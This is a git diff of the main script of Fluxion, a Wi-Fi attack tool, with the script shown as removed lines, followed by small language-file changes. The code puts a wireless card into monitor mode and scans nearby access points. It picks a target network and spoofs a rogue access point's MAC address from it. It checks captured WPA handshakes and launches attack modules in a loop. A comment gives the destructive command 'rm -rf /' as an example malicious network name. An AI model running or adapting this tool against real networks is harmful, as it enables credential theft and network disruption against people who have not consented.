│☢╫ │▒┌╤┐▒ ║▓▒\ ▓║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯" - FLUXIONBanner+=("$FormatCenterLiterals") - - clear - - if [ "$FLUXIONAuto" ]; then echo -e "$CBlu" - else echo -e "$CRed" - fi - - for line in "${FLUXIONBanner[@]}"; do - echo "$line" - sleep 0.05 - done - #echo "${FLUXIONBanner[@]}" - echo - - sleep 0.1 - format_center_literals "${CGrn}Site: ${CRed}https://github.com/FluxionNetwork/fluxion$CClr" - echo -e "$FormatCenterLiterals" - - sleep 0.1 - format_center_literals "${CSRed}FLUXION $FLUXIONVersion$CClr (rev. $CSBlu$FLUXIONRevision$CClr)$CYel by$CWht ghost" - echo -e "$FormatCenterLiterals" - - sleep 0.1 - if installer_utils_check_update "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion.sh" "FLUXIONVersion=" "FLUXIONRevision=" $FLUXIONVersion $FLUXIONRevision; then installer_utils_run_update "https://github.com/FluxionNetwork/fluxion/archive/master.zip" "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" "$(dirname "$FLUXIONPath")" - fi - - echo - - FLUXIONCLIToolsRequired=("aircrack-ng" "python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" "fuser:psmisc" "killall:psmisc") - FLUXIONCLIToolsMissing=() - - while ! installer_utils_check_dependencies FLUXIONCLIToolsRequired[@]; do installer_utils_run_dependencies InstallerUtilsCheckDependencies[@] - done -fi - -#################################### < Resolution > #################################### -function fluxion_set_resolution() { # Windows + Resolution - # Calc options - RATIO=4 - - # Get demensions - SCREEN_SIZE=$(xdpyinfo | grep dimension | awk '{print $4}' | tr -d "(") - SCREEN_SIZE_X=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $1}')) - SCREEN_SIZE_Y=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $2}')) - - PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc) - NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$RATIO}")/1 | bc) - - NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$RATIO}")/1 | bc) - - SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2))) - SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2))) - - # Upper - TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0" - TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0" - TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0" - - # Lower - BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0" - BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0" - BOTTOM="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0" - - # Y mid - LEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-$SCREEN_SIZE_MID_Y" - RIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+$SCREEN_SIZE_MID_Y" - - # Big - TOPLEFTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y+0+0" - TOPRIGHTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y-0+0" -} - -##################################### < Language > ##################################### -function fluxion_set_language() { - if [ "$FLUXIONAuto" ]; then - FLUXIONLanguage="en" - else - # Get all languages available. - local languageCodes - readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') - - local languages - readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //') - - io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@] - - FLUXIONLanguage=${IOQueryFormatFields[0]} - - echo # Leave this spacer. - - # Check if all language files are present for the selected language. - find -type d -name language | while read language_dir; do - if [ ! -e "$language_dir/${FLUXIONLanguage}.sh" ]; then - echo -e "$FLUXIONVLine ${CYel}Warning${CClr}, missing language file:" - echo -e "\t$language_dir/${FLUXIONLanguage}.sh" - return 1 - fi - done - - # If a file is missing, fall back to english. - if [ $? -eq 1 ]; then - echo -e "\n\n$FLUXIONVLine Falling back to English..." - sleep 5 - FLUXIONLanguage="en" - return 1 - fi - - source "$FLUXIONPath/language/$FLUXIONLanguage.sh" - fi -} - -#################################### < Interfaces > #################################### -function fluxion_unset_interface() { - # Unblock interfaces to make them available. - echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" - rfkill unblock all &>$FLUXIONOutputDevice - - # Find all monitor-mode interfaces & all AP interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingExtraWINotice" - local wiMonitors=($(iwconfig 2>&1 | grep "Mode:Monitor" | awk '{print $1}')) - - # Remove all monitor-mode & all AP interfaces. - echo -e "$FLUXIONVLine $FLUXIONRemovingExtraWINotice" - if [ ${#wiMonitors[@]} -gt 0 ]; then - local monitor - for monitor in ${wiMonitors[@]}; do - # Remove any previously created fluxion AP interfaces. - #iw dev "FX${monitor:2}AP" del &> $FLUXIONOutputDevice - - # Remove monitoring interface after AP interface. - if [[ "$monitor" == *"mon" ]]; then airmon-ng stop "$monitor" >$FLUXIONOutputDevice - else interface_set_mode "$monitor" "managed" - fi - - if [ $FLUXIONDebug ]; then - echo -e "Stopped $monitor." - fi - done - fi - - WIMonitor="" -} - -# Choose Interface -function fluxion_set_interface() { - if [ "$WIMonitor" ]; then return 0; fi - - fluxion_unset_interface - - # Gather candidate interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingWINotice" - - # List of all available wireless network interfaces. - # These will be stored in our array right below. - interface_list_wireless - - local wiAlternate=("$FLUXIONGeneralRepeatOption") - local wiAlternateInfo=("") - local wiAlternateState=("") - local wiAlternateColor=("$CClr") - - interface_prompt "$FLUXIONVLine $FLUXIONInterfaceQuery" InterfaceListWireless[@] \ - wiAlternate[@] wiAlternateInfo[@] wiAlternateState[@] wiAlternateColor[@] - - local wiSelected=$InterfacePromptIfSelected - - if [ "$wiSelected" = "$FLUXIONGeneralRepeatOption" ]; then - fluxion_unset_interface - return 1 - fi - - if [ ! "$FLUXIONWIKillProcesses" -a "$InterfacePromptIfSelectedState" = "[-]" ]; then - echo -e "$FLUXIONVLine $FLUXIONSelectedBusyWIError" - echo -e "$FLUXIONVLine $FLUXIONSelectedBusyWITip" - sleep 7 - fluxion_unset_interface - return 1 - fi - - if ! fluxion_run_interface "$wiSelected"; then return 1 - fi - - WIMonitor="$FluxionRunInterface" -} - -function fluxion_run_interface() { - if [ ! "$1" ]; then return 1; fi - - local ifSelected="$1" - - if [ "$FLUXIONWIReloadDriver" ]; then - # Get selected interface's driver details/info-descriptor. - echo -e "$FLUXIONVLine $FLUXIONGatheringWIInfoNotice" - - if ! interface_driver "$ifSelected"; then - echo -e "$FLUXIONVLine$CRed $FLUXIONUnknownWIDriverError" - sleep 3 - return 1 - fi - - local ifDriver="$InterfaceDriver" - - # I'm not really sure about this conditional here. - # FLUXION 2 had the conditional so I kept it there. - if [ ! "$(echo $ifDriver | egrep 'rt2800|rt73')" ]; then - rmmod -f $ifDriver &>$FLUXIONOutputDevice 2>&1 - - # Wait while interface becomes unavailable. - echo -e "$FLUXIONVLine $(io_dynamic_output $FLUXIONUnloadingWIDriverNotice)" - while interface_physical "$ifSelected"; do sleep 1 - done - fi - fi - - if [ "$FLUXIONWIKillProcesses" ]; then - # Get list of potentially troublesome programs. - echo -e "$FLUXIONVLine $FLUXIONFindingConflictingProcessesNotice" - # This shit has to go reeeeeal soon (airmon-ng)... - local conflictPrograms=($(airmon-ng check | awk 'NR>6{print $2}')) - - # Kill potentially troublesome programs. - echo -e "$FLUXIONVLine $FLUXIONKillingConflictingProcessesNotice" - for program in "${conflictPrograms[@]}"; do killall "$program" &>$FLUXIONOutputDevice - done - fi - - if [ "$FLUXIONWIReloadDriver" ]; then - # I'm not really sure about this conditional here. - # FLUXION 2 had the conditional so I kept it there. - if [ ! "$(echo $ifDriver | egrep 'rt2800|rt73')" ]; then modprobe "$ifDriver" &>$FLUXIONOutputDevice 2>&1 - fi - - # Wait while interface becomes available. - echo -e "$FLUXIONVLine $(io_dynamic_output $FLUXIONLoadingWIDriverNotice)" - while ! interface_physical "$ifSelected"; do sleep 1 - done - fi - - # Activate wireless interface monitor mode and save identifier. - echo -e "$FLUXIONVLine $FLUXIONStartingWIMonitorNotice" - if [ "$FLUXIONAirmonNG" ]; then - # TODO: Need to check weather switching to monitor mode below failed. - # Notice: Line below could cause issues with different airmon versions. - FluxionRunInterface=$(airmon-ng start $ifSelected | awk -F'\[phy[0-9]+\]|\)' '$0~/monitor .* enabled/{print $3}' 2>/dev/null) - else - if interface_set_mode "$ifSelected" "monitor"; then FluxionRunInterface=$ifSelected - else FluxionRunInterface="" - fi - fi - - if [ "$FluxionRunInterface" ]; then - echo -e "$FLUXIONVLine $FLUXIONMonitorModeWIEnabledNotice" - sleep 3 - else - echo -e "$FLUXIONVLine $FLUXIONMonitorModeWIFailedError" - sleep 3 - return 2 - fi -} - -###################################### < Scanner > ##################################### -function fluxion_set_scanner() { - # If scanner's already been set and globals are ready, we'll skip setup. - if [ "$APTargetSSID" -a "$APTargetChannel" -a "$APTargetEncryption" -a \ - "$APTargetMAC" -a "$APTargetMakerID" -a "$APRogueMAC" ]; then - return 0 - fi - - if [ "$FLUXIONAuto" ]; then - fluxion_run_scanner $WIMonitor - else - local choices=("$FLUXIONScannerChannelOptionAll (2.4GHz)" "$FLUXIONScannerChannelOptionAll (5GHz)" "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)" "$FLUXIONScannerChannelOptionSpecific" "$FLUXIONGeneralBackOption") - io_query_choice "$FLUXIONScannerChannelQuery" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONScannerChannelOptionAll (2.4GHz)") fluxion_run_scanner $WIMonitor "" "bg" ;; - "$FLUXIONScannerChannelOptionAll (5GHz)") fluxion_run_scanner $WIMonitor "" "a" ;; - "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") fluxion_run_scanner $WIMonitor "" "abg" ;; - "$FLUXIONScannerChannelOptionSpecific") fluxion_set_scanner_channel ;; - "$FLUXIONGeneralBackOption") - fluxion_unset_interface - return 1 - ;; - esac - fi - - if [ $? -ne 0 ]; then return 1; fi -} - -function fluxion_set_scanner_channel() { - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONScannerChannelQuery" - echo - echo -e " $FLUXIONScannerChannelSingleTip ${CBlu}6$CClr " - echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1-5$CClr " - echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1,2,5-7,11$CClr " - echo - echo -ne "$FLUXIONPrompt" - - local channels - read channels - - echo - - fluxion_run_scanner $WIMonitor $channels - if [ $? -ne 0 ]; then return 1; fi -} - -# Parameters: monitor [ channel(s) [ band(s) ] ] -function fluxion_run_scanner() { - if [ ${#@} -lt 1 ]; then return 1; fi - - echo -e "$FLUXIONVLine $FLUXIONStartingScannerNotice" - echo -e "$FLUXIONVLine $FLUXIONStartingScannerTip" - - # Remove any pre-existing scanner results. - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - if [ "$FLUXIONAuto" ]; then - sleep 30 && killall xterm & - fi - - # Begin scanner and output all results to "dump-01.csv." - if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2>/dev/null; then - echo -e "$FLUXIONVLine$CRed $FLUXIONGeneralXTermFailureError" - sleep 5 - return 1 - fi - - # Fix this below, creating subshells for something like this is somewhat ridiculous. - local scannerResultsExist=$([ -f "$FLUXIONWorkspacePath/dump-01.csv" ] && echo true) - local scannerResultsReadable=$([ -s "$FLUXIONWorkspacePath/dump-01.csv" ] && echo true) - - if [ ! "$scannerResultsReadable" ]; then - if [ "$scannerResultsExist" ]; then - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - fi - - local choices=("$FLUXIONGeneralBackOption" "$FLUXIONGeneralExitOption") - io_query_choice "$FLUXIONScannerFailedNotice" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONGeneralBackOption") return 1 ;; - "$FLUXIONGeneralExitOption") - fluxion_exitmode - return 2 - ;; - esac - fi - - # Syntheize scan operation results from output file "dump-01.csv." - echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" - # Unfortunately, mawk (alias awk) does not support the {n} times matching operator. - # readarray TargetAPCandidates < <(gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray TargetAPCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - # readarray TargetAPCandidatesClients < <(gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray TargetAPCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - - # Cleanup the workspace to prevent potential bugs/conflicts. - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - if [ ${#TargetAPCandidates[@]} -eq 0 ]; then - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - echo -e "$FLUXIONVLine $FLUXIONScannerDetectedNothingNotice" - sleep 3 - return 1 - fi -} - -###################################### < Target > ###################################### -function fluxion_unset_target_ap() { - APTargetSSID="" - APTargetChannel="" - APTargetEncryption="" - APTargetMAC="" - APTargetMakerID="" - APTargetMaker="" - APRogueMAC="" -} - -function fluxion_set_target_ap() { - if [ "$APTargetSSID" -a "$APTargetChannel" -a "$APTargetEncryption" -a \ - "$APTargetMAC" -a "$APTargetMakerID" -a "$APRogueMAC" ]; then - return 0 - fi - - fluxion_unset_target_ap - - local TargetAPCandidatesMAC=() - local TargetAPCandidatesClientsCount=() - local TargetAPCandidatesChannel=() - local TargetAPCandidatesSecurity=() - local TargetAPCandidatesSignal=() - local TargetAPCandidatesPower=() - local TargetAPCandidatesESSID=() - local TargetAPCandidatesColor=() - - for candidateAPInfo in "${TargetAPCandidates[@]}"; do - candidateAPInfo=$(echo "$candidateAPInfo" | sed -r "s/,\s*/,/g") - - local i=${#TargetAPCandidatesMAC[@]} - - TargetAPCandidatesMAC[i]=$(echo "$candidateAPInfo" | cut -d , -f 1) - TargetAPCandidatesClientsCount[i]=$(echo "${TargetAPCandidatesClients[@]}" | grep -c "${TargetAPCandidatesMAC[i]}") - TargetAPCandidatesChannel[i]=$(echo "$candidateAPInfo" | cut -d , -f 4) - TargetAPCandidatesSecurity[i]=$(echo "$candidateAPInfo" | cut -d , -f 6) - TargetAPCandidatesPower[i]=$(echo "$candidateAPInfo" | cut -d , -f 9) - TargetAPCandidatesColor[i]=$([ ${TargetAPCandidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr) - - # Parse any non-ascii characters by letting bash handle them. - # Just escape all single quotes in ESSID and let bash's $'...' handle it. - local sanitizedESSID=$(echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14 | tr -d "'" | tr -d "\"" | tr -d "<" | tr -d ">" | tr -d "&") - TargetAPCandidatesESSID[i]=$(eval "echo \$'$sanitizedESSID'") - - local power=${TargetAPCandidatesPower[i]} - if [ $power -eq -1 ]; then - # airodump-ng's man page says -1 means unsupported value. - TargetAPCandidatesQuality[i]="??" - elif [ $power -le $FLUXIONNoiseFloor ]; then - TargetAPCandidatesQuality[i]=0 - elif [ $power -gt $FLUXIONNoiseCeiling ]; then - TargetAPCandidatesQuality[i]=100 - else - # Bash doesn't support floating point division, so I gotta work around it... - # The function is Q = ((P - F) / (C - F)); Q - quality, P - power, F - floor, C - Ceiling. - TargetAPCandidatesQuality[i]=$(((${TargetAPCandidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10))) - fi - done - - local headerTitle=$( - format_center_literals "WIFI LIST" - echo -n "$FormatCenterLiterals\n\n" - ) - - format_apply_autosize "$CRed[$CSYel ** $CClr$CRed]$CClr %-*.*s %4s %3s %3s %2s %-8.8s %18s\n" - local headerFields=$(printf "$FormatApplyAutosize" "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID") - - format_apply_autosize "$CRed[$CSYel%03d$CClr$CRed]%b %-*.*s %3s%% %3s %3d %2s %-8.8s %18s\n" - io_query_format_fields "$headerTitle$headerFields" "$FormatApplyAutosize" \ - TargetAPCandidatesColor[@] \ - TargetAPCandidatesESSID[@] \ - TargetAPCandidatesQuality[@] \ - TargetAPCandidatesPower[@] \ - TargetAPCandidatesClientsCount[@] \ - TargetAPCandidatesChannel[@] \ - TargetAPCandidatesSecurity[@] \ - TargetAPCandidatesMAC[@] - - echo - - APTargetSSID=${IOQueryFormatFields[1]} - APTargetChannel=${IOQueryFormatFields[5]} - APTargetEncryption=${IOQueryFormatFields[6]} - APTargetMAC=${IOQueryFormatFields[7]} - APTargetMakerID=${APTargetMAC:0:8} - APTargetMaker=$(macchanger -l | grep ${APTargetMakerID,,} | cut -d ' ' -f 5-) - - # Sanitize network ESSID to normalize it and make it safe for manipulation. - # Notice: Why remove these? Because some smartass might decide to name their - # network something like "; rm -rf / ;". If the string isn't sanitized accidentally - # shit'll hit the fan and we'll have an extremely distressed person subit an issue. - # Removing: ' ', '/', '.', '~', '\' - APTargetSSIDClean=$(echo "$APTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g') - - # We'll change a single hex digit from the target AP's MAC address. - # This new MAC address will be used as the rogue AP's MAC address. - local APRogueMACChange=$(printf %02X $((0x${APTargetMAC:13:1} + 1))) - APRogueMAC="${APTargetMAC::13}${APRogueMACChange:1:1}${APTargetMAC:14:4}" -} - -function fluxion_show_ap_info() { - format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" - - local colorlessFormat="$FormatApplyAutosize" - local colorfullFormat=$(echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g') - - printf "$colorlessFormat" "" "ESSID" "\"$APTargetSSID\" / $APTargetEncryption" "" - printf "$colorlessFormat" "" "Channel" "$APTargetChannel" "" - printf "$colorfullFormat" "" "BSSID" "$APTargetMAC ($CYel${APTargetMaker:-UNKNOWN}$CClr)" "" - - echo -} - -#################################### < AP Service > #################################### -function fluxion_unset_ap_service() { - APRogueService="" -} - -function fluxion_set_ap_service() { - if [ "$APRogueService" ]; then return 0; fi - - fluxion_unset_ap_service - - if [ "$FLUXIONAuto" ]; then - APRogueService="hostapd" - else - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONAPServiceQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONAPServiceHostapdOption" "$FLUXIONAPServiceAirbaseOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONAPServiceHostapdOption") APRogueService="hostapd" ;; - "$FLUXIONAPServiceAirbaseOption") APRogueService="airbase-ng" ;; - "$FLUXIONGeneralBackOption") - fluxion_unset_ap_service - return 1 - ;; - *) - fluxion_conditional_bail - return 1 - ;; - esac - fi - - # AP Service: Load the service's helper routines. - source "lib/ap/$APRogueService.sh" -} - -###################################### < Hashes > ###################################### -function fluxion_check_hash() { - if [ ! -f "$APTargetHashPath" -o ! -s "$APTargetHashPath" ]; then - echo -e "$FLUXIONVLine $FLUXIONHashFileDoesNotExistError" - sleep 3 - return 1 - fi - - local verifier - - if [ "$FLUXIONAuto" ]; then - verifier="pyrit" - else - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONHashVerificationMethodPyritOption") verifier="pyrit" ;; - "$FLUXIONHashVerificationMethodAircrackOption") verifier="aircrack-ng" ;; - "$FLUXIONGeneralBackOption") return 1 ;; - esac - fi - - hash_check_handshake "$verifier" "$APTargetHashPath" "$APTargetSSID" "$APTargetMAC" >$FLUXIONOutputDevice - local hashResult=$? - - # A value other than 0 means there's an issue with the hash. - if [ $hashResult -ne 0 ]; then echo -e "$FLUXIONVLine $FLUXIONHashInvalidError" - else echo -e "$FLUXIONVLine $FLUXIONHashValidNotice" - fi - - sleep 3 - - if [ $hashResult -ne 0 ]; then return 1; fi -} - -function fluxion_set_hash_path() { - fluxion_header - echo - echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileQuery" - echo - echo -ne "$FLUXIONAbsolutePathInfo: " - read APTargetHashPath -} - -function fluxion_unset_hash() { - APTargetHashPath="" -} - -function fluxion_set_hash() { - if [ "$APTargetHashPath" ]; then return 0; fi - - fluxion_unset_hash - - # Scan for an existing hash for potential use, if one exists, - # ask the user if we should use it, or to skip it. - if [ -f "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" -a \ - -s "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" ]; then - - if [ ! "$FLUXIONAuto" ]; then - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - printf "Path: %s\n" "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" - echo -ne "$FLUXIONVLine ${CRed}$FLUXIONUseFoundHashQuery$CClr [${CWht}Y$CClr/n] " - - read APTargetHashPathConsidered - - echo - fi - - if [ "$APTargetHashPathConsidered" = "" -o "$APTargetHashPathConsidered" = "y" -o "$APTargetHashPathConsidered" = "Y" ]; then - APTargetHashPath="$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" - fluxion_check_hash - # If the user decides to go back, we must unset. - if [ $? -ne 0 ]; then - fluxion_unset_hash - return 1 - fi - fi - fi - - # If the hash was not found, or if it was skipped, - # ask for location or for gathering one. - while [ ! -f "$APTargetHashPath" -o ! -s "$APTargetHashPath" ]; do - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONHashSourceQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONHashSourcePathOption" "$FLUXIONHashSourceRescanOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONHashSourcePathOption") - fluxion_set_hash_path - fluxion_check_hash - ;; - "$FLUXIONHashSourceRescanOption") fluxion_set_hash ;; # Rescan checks hash automatically. - "$FLUXIONGeneralBackOption") - fluxion_unset_hash - return 1 - ;; - esac - - # This conditional is required for return values - # of operation performed in the case statement. - if [ $? -ne 0 ]; then - fluxion_unset_hash - return 1 - fi - done - - # Copy to workspace for hash-required operations. - cp "$APTargetHashPath" "$FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap" -} - -###################################### < Attack > ###################################### -function fluxion_unset_attack() { - if [ "$FLUXIONAttack" ]; then unprep_attack - fi - FLUXIONAttack="" -} - -# Select the attack strategy to be used. -function fluxion_set_attack() { - if [ "$FLUXIONAttack" ]; then return 0; fi - - fluxion_unset_attack - - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONAttackQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - #local attacksMeta=$(head -n 3 attacks/*/language/$FLUXIONLanguage.sh) - - #local attacksIdentifier - #readarray -t attacksIdentifier < <("`echo "$attacksMeta" | grep -E "^# identifier: " | sed -E 's/# \w+: //'`") - - #local attacksDescription - #readarray -t attacksDescription < <("`echo "$attacksMeta" | grep -E "^# description: " | sed -E 's/# \w+: //'`") - - local attacks - readarray -t attacks < <(ls -1 attacks) - - local descriptions - readarray -t descriptions < <(head -n 3 attacks/*/language/$FLUXIONLanguage.sh | grep -E "^# description: " | sed -E 's/# \w+: //') - - local identifiers=() - - local attack - for attack in "${attacks[@]}"; do - local identifier="$(head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | grep -E "^# identifier: " | sed -E 's/# \w+: //')" - if [ "$identifier" ]; then identifiers+=("$identifier") - else identifiers+=("$attack") - fi - done - - attacks+=("$FLUXIONGeneralBackOption") - identifiers+=("$FLUXIONGeneralBackOption") - descriptions+=("") - - io_query_format_fields "" "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" attacks[@] identifiers[@] descriptions[@] - - echo - - if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralBackOption" ]; then - fluxion_unset_target_ap - fluxion_unset_attack - return 1 - fi - - FLUXIONAttack=${IOQueryFormatFields[0]} - - # Load attack and its corresponding language file. - source "attacks/$FLUXIONAttack/language/$FLUXIONLanguage.sh" - source "attacks/$FLUXIONAttack/attack.sh" - - prep_attack - - if [ $? -ne 0 ]; then - fluxion_unset_attack - return 1 - fi -} - -# Attack -function fluxion_run_attack() { - start_attack - - local choices=("$FLUXIONSelectAnotherAttackOption" "$FLUXIONGeneralExitOption") - io_query_choice "$(io_dynamic_output $FLUXIONAttackInProgressNotice)" choices[@] - - echo - - # IOQueryChoice is a global, meaning, its value is volatile. - # We need to make sure to save the choice before it changes. - local choice="$IOQueryChoice" - - stop_attack - - if [ "$choice" = "$FLUXIONGeneralExitOption" ]; then fluxion_handle_exit; fi - - fluxion_unset_attack -} - -################################### < FLUXION Loop > ################################### -fluxion_set_resolution -fluxion_set_language - -while true; do - fluxion_set_interface - if [ $? -ne 0 ]; then continue; fi - fluxion_set_scanner - if [ $? -ne 0 ]; then continue; fi - fluxion_set_target_ap - if [ $? -ne 0 ]; then continue; fi - fluxion_set_attack - if [ $? -ne 0 ]; then continue; fi - fluxion_run_attack - if [ $? -ne 0 ]; then continue; fi -done - -# FLUXSCRIPT END diff --git a/language/cs.sh b/language/cs.sh index 2928752..97a5bab 100755 --- a/language/cs.sh +++ b/language/cs.sh @@ -35,6 +35,7 @@ FLUXIONAbsolutePathInfo="Absolute path" FLUXIONScannerChannelQuery="Vyberte kanál" FLUXIONScannerChannelOptionAll="Všechny kanály" FLUXIONScannerChannelOptionSpecific="Specifický kanál(y)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelSingleTip="Jeden kanál" FLUXIONScannerChannelMiltipleTip="Více kanálů" diff --git a/language/de.sh b/language/de.sh index 41030a5..f8267c9 100755 --- a/language/de.sh +++ b/language/de.sh @@ -2,26 +2,26 @@ # German # native: Deutsch -FLUXIONInterfaceQuery="Wähle deine Netzwerkkarte aus" -FLUXIONUnblockingWINotice="Entferne den Softblock von allen Netzwerkkarten..." -FLUXIONFindingExtraWINotice="Schaue nach fremden drahlosen Netzwerkkarten..." 